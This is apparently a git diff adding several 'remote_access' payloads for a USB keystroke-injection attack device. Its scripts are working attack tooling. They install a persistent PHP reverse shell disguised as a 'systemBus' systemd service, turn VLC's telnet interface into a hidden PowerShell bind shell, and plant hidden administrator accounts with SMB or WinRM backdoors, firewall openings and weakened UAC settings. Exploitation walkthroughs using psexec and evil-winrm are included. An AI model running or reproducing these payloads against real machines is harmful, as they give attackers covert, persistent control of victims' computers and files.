Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh \&
Q ENTER
Q STRING disown
Q ENTER
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

18
payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh Normal file
View File

@@ -0,0 +1,18 @@
#!/bin/bash
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system/
echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop
cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/
chmod +x /var/tmp/.system/shc
/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
rm /var/tmp/.system/pop*
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc

BIN
payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc Normal file
View File

Binary file not shown.

50
payloads/library/remote_access/videolan-vlc_bind-shell/README.md Normal file
View File

@@ -0,0 +1,50 @@
# "VideoLan VLC Media Player" Bind Shell
- Title: "VideoLan VLC Media Player" Bind Shell
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Concept
In the list of commands allowed by "VideoLan VLC Media Player" on the "Telnet" interface, the use of the command "add" with a wrong argument redirects to the "stderr" of the process the exact content of this argument. The PowerShell script listens to the "stderr" output of the "VideoLan VLC Media Player" process and retrieves the payload to execute it.
## Description
1) Hide "PowerShell" window.
2) Determines the path of the "VLC Media Player" executable.
3) Creates two rules on the native firewall of "Microsoft Windows" to :
- Allow the executable to open a TCP port.
- Allow all incoming connections on that TCP port.
4) Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
5) Redirects the standard error output of this process and retrieves the payload for execution.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly TELNET_PORT="44423"
readonly TELNET_PASSWORD="VLC_T3LN3T"
```
## Exploitation
```
hacker@hacker-computer:~$ nmap -Pn -sT -p 44423 <TARGET-IP>
[...]
hacker@hacker-computer:~$ telnet <TARGET-IP> 44423
Trying <TARGET-IP>...
Connected to <TARGET-IP>.
Escape character is '^]'.
VLC media player 3.0.18 Vetinari
Password: <TELNET_PASSWORD>
Welcome, Master
> add "EXEC/(ls C:\Users\) > .\..\..\loot\ls.log"
> add "EXEC/(ipconfig) > .\..\..\loot\ipconfig.log"
> shutdown
```

86
payloads/library/remote_access/videolan-vlc_bind-shell/payload.ps1 Normal file
View File

@@ -0,0 +1,86 @@
<#
# Author: TW-D
# Version: 1.0
#>
Param (
[String] $TELNET_PORT,
[String] $TELNET_PASSWORD
)
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
# Determines the path of the "VLC Media Player" executable.
#
$VIDEOLAN_64 = "$(Join-Path -Path "${ENV:ProgramFiles}" -ChildPath "VideoLAN\VLC\vlc.exe")"
$VIDEOLAN_32 = "$(Join-Path -Path "${ENV:ProgramFiles(x86)}" -ChildPath "VideoLAN\VLC\vlc.exe")"
$VIDEOLAN_UNKNOW = "$(Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\" -Name "InstallLocation" -ErrorAction SilentlyContinue)\vlc.exe"
$VIDEOLAN_PATH = ""
Switch ($True) {
(Test-Path -Path "${VIDEOLAN_64}") {$VIDEOLAN_PATH = "${VIDEOLAN_64}"}
(Test-Path -Path "${VIDEOLAN_32}") {$VIDEOLAN_PATH = "${VIDEOLAN_32}"}
(Test-Path -Path "${VIDEOLAN_UNKNOW}") {$VIDEOLAN_PATH = "${VIDEOLAN_UNKNOW}"}
}
If ($TELNET_PORT -And $TELNET_PASSWORD -And $VIDEOLAN_PATH) {
# Creates two rules on the native firewall of "Microsoft Windows" to :
# - Allow the executable to open a TCP port.
# - Allow all incoming connections on that TCP port.
#
(NETSH ADVFIREWALL FIREWALL ADD RULE NAME="VideoLAN VLC Media Player Stream Port" PROTOCOL=TCP LOCALPORT=$TELNET_PORT DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN) | Out-Null
(NETSH ADVFIREWALL FIREWALL ADD RULE NAME="VideoLAN VLC Media Player Stream Service" ENABLE=YES PROGRAM="${VIDEOLAN_PATH}" DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN) | Out-Null
Do {
# Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
#
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessInfo.FileName = "${VIDEOLAN_PATH}"
$ProcessInfo.Arguments = "--qt-notification 0 --qt-start-minimized --intf telnet --telnet-host 0.0.0.0 --telnet-port ${TELNET_PORT} --telnet-password ${TELNET_PASSWORD}"
$ProcessInfo.CreateNoWindow = $True
$ProcessInfo.UseShellExecute = $False
$ProcessInfo.RedirectStandardOutput = $False
$ProcessInfo.RedirectStandardError = $True
$Process = New-Object System.Diagnostics.Process
$Process.StartInfo = $ProcessInfo
# Redirects the standard error output of this process and retrieves the payload for execution.
#
Register-ObjectEvent -InputObject $Process -EventName "ErrorDataReceived" -SourceIdentifier "Process.Stderr" -Action {
$Data = $EventArgs.Data
("${Data}" -Match '\%22(?<Action>.+)%2F(?<Argument>.+)\%22')
$Action = $Matches.Action
$Argument = [URI]::UnescapeDataString($Matches.Argument)
If ($Action -And $Argument) {
Try {
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoLogo -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command ${Argument}" -NoNewWindow
} Catch {}
}
Clear-Variable -Name "Matches"
} | Out-Null
Register-ObjectEvent -InputObject $Process -EventName "Exited" -SourceIdentifier "Process.Exited" -Action {
Write-Host "Process.Exited !"
} | Out-Null
Try {
$Process.Start() | Out-Null
$Process.BeginErrorReadLine()
$Process.WaitForExit()
} Finally {
Unregister-Event -SourceIdentifier "Process.Stderr"
Unregister-Event -SourceIdentifier "Process.Exited"
}
} While ($True)
}

89
payloads/library/remote_access/videolan-vlc_bind-shell/payload.txt Normal file
View File

@@ -0,0 +1,89 @@
#!/bin/bash
#
# Title: "VideoLan VLC Media Player" Bind Shell
#
# Description:
# 1) Hide "PowerShell" window.
# 2) Determines the path of the "VLC Media Player" executable.
# 3) Creates two rules on the native firewall of "Microsoft Windows" to :
# - Allow the executable to open a TCP port.
# - Allow all incoming connections on that TCP port.
# 4) Starts the "VLC Media Player" executable with the "Telnet" interface enabled.
# 5) Redirects the standard error output of this process and retrieves the payload for execution.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows
# Attackmodes: HID STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 and VideoLan VLC Media Player 3.0.18
#
# NOTE
# ===============
# The target user must belong to the 'Administrator' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## INITIALIZATION ########
readonly TELNET_PORT="44423"
readonly TELNET_PASSWORD="VLC_T3LN3T"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET BB_LABEL
GET SWITCH_POSITION
######## ATTACK ########
LED ATTACK
Q GUI r
Q DELAY 3000
Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 3000
Q LEFTARROW
Q DELAY 3000
Q ENTER
Q DELAY 3000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 2000
Q STRING "CD \"\${BB_VOLUME}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -TELNET_PORT \"${TELNET_PORT}\" -TELNET_PASSWORD \"${TELNET_PASSWORD}\""
Q ENTER
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH

73
payloads/library/remote_access/win_smb-backdoor/README.md Normal file
View File

@@ -0,0 +1,73 @@
# "Microsoft Windows" SMB Backdoor
- Title: "Microsoft Windows" SMB Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Description
1) Adds a user account.
2) Adds this local user to local administrator group.
3) If the target computer is equipped with a compatible Wi-Fi card :
Avoids security measures on the internal network with the
creation of a wireless "Hosted Network".
4) Shares "C:\" directory.
5) Adds a rule to the firewall.
6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
7) Hides user account.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly SMB_USERNAME="BB_User"
readonly SMB_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly SMB_SHARE="BB_SHARE"
```
## Exploitation
>
> The name of the access point and the security key will be those defined by the values of the constants : **SMB_SHARE** and **SMB_PASSWORD**.
>
```
hacker@hacker-computer:~$ nmcli dev wifi connect "<SMB_SHARE>" password "<SMB_PASSWORD>"
```
>
> The connection identifiers will be those defined by the values of the constants : **SMB_USERNAME** and **SMB_PASSWORD**.
>
```
hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./<SMB_USERNAME>:<SMB_PASSWORD>@<TARGET>
C:\WINDOWS\system32> whoami
nt authority\system
```
>
> The share name and identifiers will be those defined by the values of the constants : **SMB_SHARE**, **SMB_USERNAME** and **SMB_PASSWORD**.
>
```
smb://<TARGET>/<SMB_SHARE>/
```

139
payloads/library/remote_access/win_smb-backdoor/payload.txt Normal file
View File

@@ -0,0 +1,139 @@
#!/bin/bash
#
# Title: "Microsoft Windows" SMB Backdoor
#
# Description:
# 1) Adds a user account.
# 2) Adds this local user to local administrator group.
# 3) If the target computer is equipped with a compatible Wi-Fi card :
# Avoids security measures on the internal network with the
# creation of a wireless "Hosted Network".
# 4) Shares "C:\" directory.
# 5) Adds a rule to the firewall.
# 6) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
# 7) Hides user account.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows
# Attackmode: HID
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# The target user must belong to the 'Administrators' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly SMB_USERNAME="BB_User"
readonly SMB_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly SMB_SHARE="BB_SHARE"
######## SETUP ########
LED SETUP
ATTACKMODE HID
######## ATTACK ########
LED ATTACK
Q DELAY 2000
Q GUI r
Q DELAY 7000
Q STRING "cmd"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 7000
Q LEFTARROW
Q DELAY 5000
Q ENTER
Q DELAY 7000
LED STAGE2
Q STRING "NET USER ${SMB_USERNAME} ${SMB_PASSWORD} /ADD"
Q ENTER
Q DELAY 1500
Q STRING "NET LOCALGROUP ${GROUP_NAME} ${SMB_USERNAME} /ADD"
Q ENTER
Q DELAY 1500
if [ "${WIRELESS_HOTSPOT}" == "true" ]
then
LED SPECIAL
Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${SMB_SHARE} KEY=${SMB_PASSWORD}"
Q ENTER
Q DELAY 5000
Q STRING "NETSH WLAN START HOSTEDNETWORK"
Q ENTER
Q DELAY 5000
fi
LED STAGE3
Q STRING "NET SHARE ${SMB_SHARE}=C:\\ /GRANT:${SMB_USERNAME},FULL /REMARK:\"BRemote BShare\""
Q ENTER
Q DELAY 1500
Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Server Message Block for BB\" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
Q ENTER
Q DELAY 1500
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${SMB_USERNAME} /t REG_DWORD /d 0"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
Q STRING "EXIT"
Q ENTER
Q DELAY 1500
######## FINISH ########
LED FINISH
shutdown -h 0

64
payloads/library/remote_access/win_winrm-backdoor/README.md Normal file
View File

@@ -0,0 +1,64 @@
# "Microsoft Windows" WinRM Backdoor
- Title: "Microsoft Windows" WinRM Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Description
1) Adds a user account.
2) Adds this local user to local administrator group.
3) If the target computer is equipped with a compatible Wi-Fi card :
Avoids security measures on the internal network with the
creation of a wireless "Hosted Network".
4) Enables "Windows Remote Management" with default settings.
5) Adds a rule to the firewall.
6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
7) Hides user account.
## Configuration
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly WINDOWS_USERNAME="BB_User"
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly HOTSPOT_NAME="BB_HOTSPOT"
```
## Exploitation
>
> The name of the access point and the security key will be those defined by the values of the constants : **HOTSPOT_NAME** and **WINDOWS_PASSWORD**.
>
```
hacker@hacker-computer:~$ nmcli dev wifi connect "<HOTSPOT_NAME>" password "<WINDOWS_PASSWORD>"
```
>
> The connection identifiers will be those defined by the values of the constants : **WINDOWS_USERNAME** and **WINDOWS_PASSWORD**.
>
```
hacker@hacker-computer:~$ evil-winrm --ip <TARGET> --user <WINDOWS_USERNAME> --password '<WINDOWS_PASSWORD>'
*Evil-WinRM* PS C:\Users\<WINDOWS_USERNAME>\Documents> whoami
desktop-xxxxxxx\<WINDOWS_USERNAME>
```

142
payloads/library/remote_access/win_winrm-backdoor/payload.txt Normal file
View File

@@ -0,0 +1,142 @@
#!/bin/bash
#
# Title: "Microsoft Windows" WinRM Backdoor
#
# Description:
# 1) Adds a user account.
# 2) Adds this local user to local administrator group.
# 3) If the target computer is equipped with a compatible Wi-Fi card :
# Avoids security measures on the internal network with the
# creation of a wireless "Hosted Network".
# 4) Enables "Windows Remote Management" with default settings.
# 5) Adds a rule to the firewall.
# 6) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
# 7) Hides user account.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows
# Attackmode: HID
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# The target user must belong to the 'Administrators' group.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly WINDOWS_USERNAME="BB_User"
readonly WINDOWS_PASSWORD="BB_P@ssW0rD"
##
# (any) Administrators
# (fr) Administrateurs
##
readonly GROUP_NAME="Administrators"
##
# Can be set to "true" if the target computer
# is equipped with a compatible Wi-Fi card.
##
readonly WIRELESS_HOTSPOT="false"
readonly HOTSPOT_NAME="BB_HOTSPOT"
######## SETUP ########
LED SETUP
ATTACKMODE HID
######## ATTACK ########
LED ATTACK
Q DELAY 2000
Q GUI r
Q DELAY 7000
Q STRING "cmd"
Q DELAY 1500
Q CTRL-SHIFT ENTER
Q DELAY 7000
Q LEFTARROW
Q DELAY 5000
Q ENTER
Q DELAY 7000
LED STAGE2
Q STRING "NET USER ${WINDOWS_USERNAME} ${WINDOWS_PASSWORD} /ADD"
Q ENTER
Q DELAY 1500
Q STRING "NET LOCALGROUP ${GROUP_NAME} ${WINDOWS_USERNAME} /ADD"
Q ENTER
Q DELAY 1500
if [ "${WIRELESS_HOTSPOT}" == "true" ]
then
LED SPECIAL
Q STRING "NETSH WLAN SET HOSTEDNETWORK MODE=ALLOW SSID=${HOTSPOT_NAME} KEY=${WINDOWS_PASSWORD}"
Q ENTER
Q DELAY 5000
Q STRING "NETSH WLAN START HOSTEDNETWORK"
Q ENTER
Q DELAY 5000
fi
LED STAGE3
Q STRING "WINRM QUICKCONFIG"
Q ENTER
Q DELAY 3000
Q STRING "y"
Q ENTER
Q DELAY 1500
Q STRING "NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Windows Remote Management for BB\" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
Q ENTER
Q DELAY 1500
Q STRING "REG ADD \"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /f /v ${WINDOWS_USERNAME} /t REG_DWORD /d 0"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
Q STRING "EXIT"
Q ENTER
Q DELAY 1500
######## FINISH ########
LED FINISH
shutdown -h 0